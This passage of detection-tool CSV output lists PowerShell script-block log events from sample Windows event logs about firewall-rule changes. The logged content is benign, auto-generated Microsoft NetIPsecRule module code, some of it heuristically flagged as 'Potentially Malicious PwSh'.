[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) 
$__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) 
$__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"SetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper 
$PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') 
-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 
'Default')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 